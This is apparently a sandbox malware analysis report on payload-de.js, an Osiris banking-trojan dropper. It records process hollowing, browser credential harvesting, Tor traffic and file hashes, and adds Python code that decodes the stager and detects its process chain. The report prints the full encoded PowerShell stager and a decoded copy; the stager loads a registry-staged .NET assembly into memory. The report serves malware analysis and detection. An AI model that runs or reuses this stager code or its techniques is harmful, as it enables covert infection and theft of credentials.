Malware Analysis Report

2025-01-22 13:34

Sample ID 210302-ql9m1sch22
Target payload-de.js
SHA256 4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45
Tags
osiris banker botnet spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45

Threat Level: Known bad

The file payload-de.js was found to be: Known bad.

Malicious Activity Summary

osiris banker botnet spyware

Osiris

Executes dropped EXE

Reads user/profile data of web browsers

Looks up external IP address via web service

Uses Tor communications

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-03-02 16:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-03-02 16:06

Reported

2021-03-02 16:08

Platform

win7v20201028

Max time kernel

112s

Max time network

13s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

Signatures

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A (2 events)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "<same encoded command as on the cmd.exe line above>"

Decoded -En argument (-En is -EncodedCommand: base64 over the UTF-16LE text of the script; decoded by the editor from the cmd.exe command line above and reflowed one statement per line, otherwise unchanged):

  <# tsemamwbwkkokeb #>
  $u=$env:UserName;
  for ($i=0;$i -le 1300;$i++){$c="HKCU:\SOFTWARE\"+$u+"1";Try{$a=$a+(Get-ItemProperty -path $c).$i}Catch{}};
  function chba{[cmdletbinding()]param([parameter(Mandatory=$true)][String]$hs);$Bytes = [byte[]]::new($hs.Length / 2);for($i=0; $i -lt $hs.Length; $i+=2){$Bytes[$i/2] = [convert]::ToByte($hs.Substring($i, 2), 16)}$Bytes};
  $i = 0;While ($True){$i++;$ko = [math]::Sqrt($i);if ($ko -eq 1000){ break}}
  [byte[]]$b = chba($a.replace("#",$ko));
  [Reflection.Assembly]::Load($b);
  [Mode]::Setup();

What the stager does: the second stage is neither inside payload-de.js nor written to disk. It is expected to be already staged as a hex string spread over registry values named 0 to 1300 under HKCU\SOFTWARE\<username>1 (HKCU\SOFTWARE\Admin1 in this sandbox); the dropper's registry writes themselves are not itemised in this report. The script concatenates those values in order, spins until [math]::Sqrt($i) equals 1000 (one million iterations, most likely a delay and anti-emulation measure), substitutes that result, "1000", for every "#" in the hex string, hex-decodes it, loads the bytes as a .NET assembly with [Reflection.Assembly]::Load and calls the assembly's [Mode]::Setup(). The 32-bit PowerShell under SysWOW64 is selected explicitly. In this Windows 7 run the chain ends here: no child process, no dropped file and no network activity were recorded and the Osiris signature did not fire; compare behavioral2 below.
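The two decoding steps the stager performs, reimplemented offline as an added example (editor's code, not the sandbox's and not the sample's own), so the staged assembly can be recovered from a registry export of HKCU\SOFTWARE\<username>1 instead of by running the stager. ENCODED_PREFIX is the first 96 characters of the real -En argument shown above; the registry fixture, its chunk size and the shape of the dropper's registry writes are assumptions, since the report does not itemise them.

```python
import base64
import math
import re

# First 96 base64 characters of the -En argument from the cmd.exe command line
# above (-En is -EncodedCommand: base64 over the UTF-16LE encoding of the script).
ENCODED_PREFIX = ("PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIA"
                  "IAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0A")


def decode_encoded_command(b64: str) -> str:
    """Decode a powershell.exe -EncodedCommand argument to the script text."""
    return base64.b64decode(b64.strip(), validate=True).decode("utf-16-le")


def loop_token() -> str:
    """The stager spins until [math]::Sqrt($i) -eq 1000 and then substitutes that
    value for every '#' in the hex blob.  Skip the million iterations: the first
    integer whose square root is exactly 1000 is 1000**2, and PowerShell renders
    the double 1000.0 as "1000" when String.Replace receives it."""
    i = 1000 ** 2
    return str(int(math.sqrt(i)))


def rebuild_payload(values: dict, max_index: int = 1300, placeholder: str = "#") -> bytes:
    """Mirror the stager: read values named "0".."max_index" in numeric order
    (absent names are skipped, as its Try/Catch does), restore the placeholder
    and hex-decode.  `values` is {value_name: data} as read from a registry export."""
    hexblob = "".join(values[str(i)] for i in range(max_index + 1) if str(i) in values)
    hexblob = hexblob.replace(placeholder, loop_token())
    if len(hexblob) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hexblob):
        raise ValueError("reconstructed blob is not clean hex; the export is incomplete or mangled")
    return bytes.fromhex(hexblob)


def looks_like_pe(blob: bytes) -> bool:
    """[Reflection.Assembly]::Load needs a PE image: 'MZ' at 0, 'PE\\0\\0' at e_lfanew."""
    if len(blob) < 0x44 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed fixture (not from the report): a minimal PE-shaped blob whose hex
# contains the byte pair 10 00, so the '#' substitution is actually exercised.
SAMPLE_IMAGE = (b"MZ" + b"\x00" * (0x3C - 2)
                + (0x40).to_bytes(4, "little")   # e_lfanew -> offset 0x40
                + b"PE\x00\x00"
                + b"\x10\x00\xab")


def stage_like_dropper(blob: bytes, chunk: int = 16, placeholder: str = "#") -> dict:
    """Constructed stand-in for the dropper's registry writes (assumed shape):
    hex-encode, hide every "1000" behind the placeholder, split into numbered
    values.  The 16-character chunk size is an assumption."""
    hexblob = blob.hex().replace(loop_token(), placeholder)
    return {str(n): hexblob[i:i + chunk]
            for n, i in enumerate(range(0, len(hexblob), chunk))}


def demo() -> bytes:
    """Round trip: stage the fixture the way the dropper would, rebuild it the way the stager does."""
    return rebuild_payload(stage_like_dropper(SAMPLE_IMAGE))


if __name__ == "__main__":
    print(decode_encoded_command(ENCODED_PREFIX))
    print(demo() == SAMPLE_IMAGE, looks_like_pe(demo()))
```

Against a real host, load the value data of HKCU\SOFTWARE\<username>1 (from `reg export` or a forensic registry parser) into the dict and pass it to rebuild_payload(); looks_like_pe() confirms the decode before the bytes go to a .NET decompiler. Values that are missing from the export are silently skipped, exactly as the stager's Try/Catch skips them, so a clean hex check that fails usually means the export is incomplete rather than that the decoder is wrong.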

Network

N/A

Files

memory/1092-2-0x0000000000000000-mapping.dmp

memory/1908-3-0x0000000002F30000-0x0000000002F34000-memory.dmp

memory/1760-4-0x0000000000000000-mapping.dmp

memory/1760-5-0x0000000076271000-0x0000000076273000-memory.dmp

memory/1760-6-0x00000000740D0000-0x00000000747BE000-memory.dmp

memory/1760-7-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

memory/1760-8-0x0000000004A00000-0x0000000004A01000-memory.dmp

memory/1760-9-0x0000000001E90000-0x0000000001E91000-memory.dmp

memory/1760-10-0x0000000001E92000-0x0000000001E93000-memory.dmp

memory/1760-11-0x0000000002530000-0x0000000002531000-memory.dmp

memory/1760-12-0x0000000002950000-0x0000000002951000-memory.dmp

memory/1760-15-0x00000000060D0000-0x00000000060D1000-memory.dmp

memory/1760-20-0x0000000006110000-0x0000000006111000-memory.dmp

memory/1760-21-0x0000000006250000-0x0000000006251000-memory.dmp

memory/1760-28-0x00000000062E0000-0x00000000062E1000-memory.dmp

memory/1760-29-0x000000007EF30000-0x000000007EF31000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-03-02 16:06

Reported

2021-03-02 16:08

Platform

win10v20201028

Max time kernel

150s

Max time network

136s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

Signatures

Osiris (Kronos-derived banking trojan)

banker botnet osiris

Reads user/profile data of web browsers

spyware

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A (2 events)

Uses Tor communications

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3360 set thread context of 3960 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Admin.exe

PID 3360 is powershell.exe and PID 3960 is Admin.exe. Together with the ten WriteProcessMemory events from 3360 into 3960 listed below this is the pattern of process hollowing: the loaded .NET assembly starts Admin.exe, overwrites its memory and redirects its thread, so the code that runs as Admin.exe is not necessarily the Admin.exe whose hashes appear under Files.

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Users\Admin\AppData\Roaming\Admin.exe | N/A

IntelliForms\Storage2 is where Internet Explorer keeps saved web-form credentials (AutoComplete passwords), so this "settings" change belongs to the credential harvesting flagged by "Reads user/profile data of web browsers" rather than to a browser-configuration change.

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A (3 events)
N/A | N/A | C:\Users\Admin\AppData\Roaming\Admin.exe | N/A (61 events)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\Admin.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 672 wrote to memory of 184 (2 events) | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe
PID 184 wrote to memory of 3360 (3 events) | N/A | C:\Windows\System32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3360 wrote to memory of 3960 (10 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3960 wrote to memory of 1780 (2 events) | N/A | C:\Users\Admin\AppData\Roaming\Admin.exe | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
PID 3960 wrote to memory of 776 (2 events) | N/A | C:\Users\Admin\AppData\Roaming\Admin.exe | C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
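The process lineage in the table above, turned into detection logic as an added example (editor's code, not the sandbox's or the sample's). It runs over constructed Sysmon-style process-creation records that reuse the PIDs, images and command lines this report shows; the PPID 4120 of wscript.exe, the record field names and the shortened encoded command (the real one is about 2.7 KB) are assumptions. The rules key on the chain wscript.exe -> cmd.exe -> powershell.exe -En -> executable under %APPDATA%, not on file hashes, because Admin.exe is hollowed by powershell.exe and its on-disk hash is the weakest indicator here.

```python
import base64
import re

# Constructed stand-in for the real -En argument: just the two statements the
# reflective-load rule keys on, encoded the way PowerShell expects (UTF-16LE, base64).
ENC = base64.b64encode(
    "[Reflection.Assembly]::Load($b);[Mode]::Setup();".encode("utf-16-le")).decode()

# Constructed process-creation records (not the report's raw telemetry),
# reproducing the parent/child chain recorded in the WriteProcessMemory table.
EVENTS = [
    {"pid": 672, "ppid": 4120, "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js"},
    {"pid": 184, "ppid": 672, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "' + ENC + '"'},
    {"pid": 3360, "ppid": 184, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En " + ENC},
    {"pid": 3960, "ppid": 3360, "image": r"C:\Users\Admin\AppData\Roaming\Admin.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\Admin.exe"'},
    {"pid": 1780, "ppid": 3960, "image": r"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"'},
    {"pid": 776, "ppid": 3960,
     "image": r"C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe",
     "cmdline": '"1577599147.exe"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Per-user directories a dropper can write without elevation.
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local\\Temp)\\", re.I)
# -EncodedCommand and its accepted abbreviations, optionally quoted.
ENC_ARG = re.compile(r"-(?:EncodedCommand|Enc|En)\s+\"?([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Decoded -EncodedCommand payload if the command line carries one, else ""."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def ancestry(events, pid: int) -> list:
    """Image names from the root of the recorded tree down to `pid`."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect(events) -> list:
    """(rule, pid) pairs; each rule is one link of the chain this report records."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name in SCRIPT_HOSTS and USER_WRITABLE.search(e["cmdline"]):
            hits.append(("script-host-runs-script-from-user-writable-path", e["pid"]))
        if name in SHELLS and pname in SCRIPT_HOSTS:
            hits.append(("script-host-spawns-shell", e["pid"]))
        # The encoded blob is visible on the cmd.exe line as well as on powershell's.
        if "[reflection.assembly]::load" in decode_encoded_command(e["cmdline"]).lower():
            hits.append(("encoded-command-reflective-assembly-load", e["pid"]))
        if pname == "powershell.exe" and USER_WRITABLE.search(e["image"]):
            hits.append(("powershell-spawns-exe-from-user-writable-path", e["pid"]))
        if parent and USER_WRITABLE.search(e["image"]) and USER_WRITABLE.search(parent["image"]):
            hits.append(("user-writable-exe-spawns-user-writable-exe", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:50s} pid={pid:<5d} chain={' > '.join(ancestry(EVENTS, pid))}")
```

Each rule on its own is noisy in an enterprise (administrators do run encoded commands); the value is the lineage, which is why the output prints the full ancestry next to every hit so a triage analyst sees wscript.exe > cmd.exe > powershell.exe > admin.exe at a glance.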

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "<same encoded command as on the cmd.exe line in behavioral1 above>"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "<same encoded command as on the cmd.exe line in behavioral1 above>"

C:\Users\Admin\AppData\Roaming\Admin.exe

"C:\Users\Admin\AppData\Roaming\Admin.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe

"1577599147.exe"

Network

Country | Destination | Domain | Proto
N/A | 66.111.2.131:9030 | 66.111.2.131 | tcp
N/A | 8.8.8.8:53 | api.ipify.org | udp
N/A | 23.21.252.4:443 | api.ipify.org | tcp
N/A | 91.203.145.114:80 | 91.203.145.114 | tcp
N/A | 185.213.20.247:443 | N/A | tcp
N/A | 8.8.8.8:53 | time-a.nist.gov | udp
N/A | 129.6.15.28:13 | time-a.nist.gov | tcp
N/A | 199.249.230.103:80 | 199.249.230.103 | tcp
N/A | 178.17.170.179:80 | 178.17.170.179 | tcp
N/A | 80.179.96.165:80 | 80.179.96.165 | tcp
N/A | 94.16.109.41:80 | 94.16.109.41 | tcp
N/A | 135.148.33.56:80 | 135.148.33.56 | tcp
N/A | 38.147.122.250:443 | N/A | tcp
N/A | 45.137.124.122:80 | 45.137.124.122 | tcp
N/A | 45.140.170.187:80 | 45.140.170.187 | tcp
N/A | 23.129.64.235:80 | 23.129.64.235 | tcp
N/A | 127.0.0.1:32767 | N/A | tcp
N/A | 51.75.75.202:80 | N/A | tcp
N/A | 193.234.15.60:80 | 193.234.15.60 | tcp
N/A | 158.255.7.61:80 | 158.255.7.61 | tcp

Reading the table: 66.111.2.131:9030 is the Tor bridge authority (Serge) on its DirPort, consistent with the "Uses Tor communications" signature; api.ipify.org is the external-IP lookup; time-a.nist.gov:13 is a Daytime-protocol (TCP 13) time check. The bare IP:80 and IP:443 endpoints are not resolved by the report; given the Tor bootstrap they are consistent with directory mirrors and relays, but nothing here identifies which of them, if any, is the banker's C2, so treat them as leads rather than confirmed indicators. 127.0.0.1:32767 is a loopback connection; the report does not show which process listens on that port.

Files

memory/672-2-0x0000022D7C820000-0x0000022D7C927000-memory.dmp

memory/184-3-0x0000000000000000-mapping.dmp

memory/3360-4-0x0000000000000000-mapping.dmp

memory/3360-5-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/3360-6-0x0000000006F70000-0x0000000006F71000-memory.dmp

memory/3360-7-0x0000000007630000-0x0000000007631000-memory.dmp

memory/3360-8-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

memory/3360-9-0x0000000006FF2000-0x0000000006FF3000-memory.dmp

memory/3360-10-0x0000000007560000-0x0000000007561000-memory.dmp

memory/3360-11-0x0000000007D50000-0x0000000007D51000-memory.dmp

memory/3360-12-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

memory/3360-13-0x0000000008010000-0x0000000008011000-memory.dmp

memory/3360-14-0x0000000007EA0000-0x0000000007EA1000-memory.dmp

memory/3360-15-0x0000000008790000-0x0000000008791000-memory.dmp

memory/3360-16-0x0000000008700000-0x0000000008701000-memory.dmp

memory/3360-17-0x0000000009760000-0x0000000009761000-memory.dmp

memory/3360-18-0x0000000009470000-0x0000000009471000-memory.dmp

memory/3360-19-0x00000000096C0000-0x00000000096C1000-memory.dmp

memory/3360-20-0x0000000009D00000-0x0000000009D01000-memory.dmp

memory/3360-21-0x0000000009870000-0x0000000009872000-memory.dmp

memory/3360-22-0x00000000099B0000-0x0000000009B23000-memory.dmp

memory/3960-23-0x0000000000400000-0x0000000000456000-memory.dmp

memory/3960-24-0x0000000000401698-mapping.dmp

C:\Users\Admin\AppData\Roaming\Admin.exe

MD5 4db1ee663bd9f021da04edca144f4bd7
SHA1 709d318281ceabef246af0107b1db12f237b793a
SHA256 3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
SHA512 ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

memory/3960-28-0x00000000006C0000-0x000000000075F000-memory.dmp

memory/3960-27-0x0000000000400000-0x0000000000456000-memory.dmp

memory/1780-29-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5 e66e746f849f7abbcdae47bb95507d20
SHA1 24ae1f68f97c2e58a7ade40b0223b46e87b94077
SHA256 080a258cf8f83417af114097d40367eaae83ef8bf5113e3597a2b600b1788351
SHA512 82bfcf11b48c1de0772781795636a46b7c57afa62cf7dad37e48463851800526a0521e393dd5f09996a12c6e4be785db0b933e0d4eb82223aeae697634ac3966

memory/776-33-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe

MD5 9f385a9a69a4d9e18055743f0694976b
SHA1 2c2385ea964a33f803e96e364d4a05771c733921
SHA256 45f175bc165a3f8d9a05da48bdc4c1f234386588e0d003df094f72d019ae6216
SHA512 e9e78eb02bad22815648723138a7443da527779644ad9f9e776f91ba796b255c7556c5fe82ea526825c23ea376ed90d4dd5f31b026d2ff00605d8db9b0729c3c
